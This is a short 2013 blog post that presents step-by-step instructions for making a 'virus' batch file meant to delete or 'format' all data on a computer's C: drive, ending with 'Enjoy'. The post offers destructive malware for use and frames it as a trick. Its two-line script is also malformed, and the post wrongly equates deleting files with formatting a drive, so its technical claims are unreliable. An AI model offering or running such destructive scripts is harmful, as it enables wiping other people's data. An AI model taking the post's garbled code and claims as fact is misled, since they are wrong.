Saturday, August 3, 2013

Creating A Virus That Format C: Drive

How To Make A Virus the delete or format all data of C: drive of a computer in few seconds.


In this trick we will be creating virus in notepad using batch file programming. This virus is really simple to create yet very dangerous.

Method:

1. Open Notepad and copy below code into it.

@Echo off
Del C:\ *.* |y

2. Then Save this file as virus.bat
3. Now, running this file format C Drive.

Enjoy 

0 comments:

Post a Comment